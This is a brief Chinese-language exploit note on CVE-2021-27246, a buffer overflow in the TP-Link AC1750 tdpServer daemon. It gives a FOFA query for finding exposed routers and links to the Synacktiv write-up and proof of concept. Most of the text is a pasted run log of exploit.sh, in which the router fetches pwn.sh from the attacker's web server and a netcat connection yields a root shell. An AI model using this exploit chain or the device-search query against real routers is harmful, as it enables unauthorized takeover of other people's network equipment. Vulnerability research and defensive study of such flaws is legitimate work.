目录
在TP-Link AC1750的tdpServer守护程序中存在漏洞,没有检查json数据的大小,导致了缓冲区溢出,通过缓冲区溢出,可以导致代码执行。
FOFA: #
app="TP_LINK-AC1750"
漏洞详情见:https://www.synacktiv.com/publications/pwn2own-tokyo-2020-defeating-the-tp-link-ac1750.html
poc:https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020
$ bash exploit.sh [+] Launching web server for distribution of pwn.sh Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... INFO:tdpwn:Associating 49 onemesh clients... INFO:tdpwn:Done! And wait for 80 seconds... 80 seconds left... 70 seconds left... 60 seconds left... 50 seconds left... 40 seconds left... 30 seconds left... 20 seconds left... 10 seconds left... [+] Trying to exploit the tddp injection INFO:tdp:Preparing tddpv1_configset payload INFO:tdp:Sending payload [+] Trying the root shell (Low probability of success...) nc -v 192.168.0.1 12345 nc: connect to 192.168.0.1 port 12345 (tcp) failed: Connection refused [ ] If shell hasn't succeed, don't worry, we retry INFO:tdpwn:Associating 49 onemesh clients... INFO:tdpwn:Done! And wait for 80 seconds... 80 seconds left... 70 seconds left... 60 seconds left... 50 seconds left... 40 seconds left... 30 seconds left... 20 seconds left... 10 seconds left... [+] Trying to exploit the tddp injection INFO:tdp:Preparing tddpv1_configset payload INFO:tdp:Sending payload 192.168.0.1 - - [30/Nov/2020 12:10:59] "GET /pwn.sh HTTP/1.1" 200 - [+] Trying the root shell (High probability of success...) nc -v 192.168.0.1 12345 Connection to 192.168.0.1 12345 port [tcp/*] succeeded! uname -a Linux ArcherA7v5 3.3.8 #1 Mon Sep 14 19:52:46 CST 2020 mips GNU/Linux id uid=0(root) gid=0(root) ^C[-] Stopping Webserver, now Terminated
ref:
- https://www.synacktiv.com/public ... tp-link-ac1750.html
- https://github.com/synacktiv/CVE-2021-27246_Pwn2Own2020
- https://nvd.nist.gov/vuln/detail/CVE-2021-27246